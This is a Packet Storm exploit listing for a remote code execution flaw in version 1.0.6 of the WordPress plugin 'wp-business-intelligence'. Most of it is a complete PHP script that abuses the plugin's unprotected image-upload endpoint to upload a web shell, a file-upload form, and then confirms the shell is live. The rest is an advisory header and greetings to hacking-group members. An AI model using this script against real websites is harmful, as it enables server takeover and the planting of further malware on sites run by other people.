WordPress Business Intelligence 1.0.6 Shell Upload

2014-03-28T00:00:00
ID PACKETSTORM:125927
Type packetstorm
Reporter Manish Tanwar
Modified 2014-03-28T00:00:00

Description

                                        
                                            `##############################################################################################  
# Exploit Title : wordpress plugin "wp-business-intelligence" Remote code execution exploit  
# Exploit Author : Manish Kishan Tanwar  
# vendor Home : www.wpbusinessintelligence.com  
# Version Affected: 1.0.6  
# Discovered At : IndiShell LAB (indishell.in aka indian cyber army)  
# Love to : zero cool,Team indishell,Hardeep Singh  
##############################################################################################  
  
  
////////////////////////////////////  
POC Remote code Execution  
////////////////////////////////////  
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php file parameters ($_GET[ 'name' ] and $HTTP_RAW_POST_DATA)  
there is no security check on these parameters and can be exploited by attacker  
  
vulnerable link  
http://127.0.0.1/wordpress/wp-content/plugins//wp-business-intelligence-lite//resources/open-flash-chart/php-ofc-library/ofc_upload_image.php  
  
shell will be here  
http://127.0.0.1/wordpress/wp-content/plugins//wp-business-intelligence-lite//resources/open-flash-chart/tmp-upload-images/shell.php  
  
///////////////////////  
/// exploit code ////  
///////////////////////  
  
<!--exploit code by Team INDISHELL(Manish Tanwar)-->  
<?php  
  
$web="http://127.0.0.1";  
$shell="ica_shell.php";  
$file="wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=";  
$up="/wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/tmp-upload-images/";  
$upshell=$up.$shell;  
$data = '<?php  
echo "<body bgcolor=black>";  
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >";   
echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input type=submit name=sut value=Upload></form>";   
if( isset($_POST[\'sut\']) )  
{  
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']))  
{   
echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>";   
}   
else {  
echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>";   
}   
}   
?>';   
$link=$web;  
$target = trim($link.$file.$shell);  
$fshell=$link.$upshell;  
  
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',  
'Content-Type: text/plain');  
  
  
$handle = curl_init();  
curl_setopt($handle, CURLOPT_URL, $target);  
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);  
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);  
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);  
$source = curl_exec($handle);  
curl_close($handle);  
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($fshell, 'r'))  
{  
echo "shell has been uploaded :D here is shell link<br><a href= ".$fshell.">".$fshell."</a>";  
}  
else  
{  
echo "sorry :( ";  
}  
?>  
/////////////////////  
end of exploit code  
////////////////////  
  
  
--==[[ Greetz To ]]==--  
############################################################################################################################################  
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas   
Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,The creator,cyber warrior,Neo hacker ICA,Suriya Prakash  
cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen   
lovetherisk,brown suger and rest of TEAM INDISHELL  
############################################################################################################################################  
--==[[Love to]]==--  
# My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)  
  
`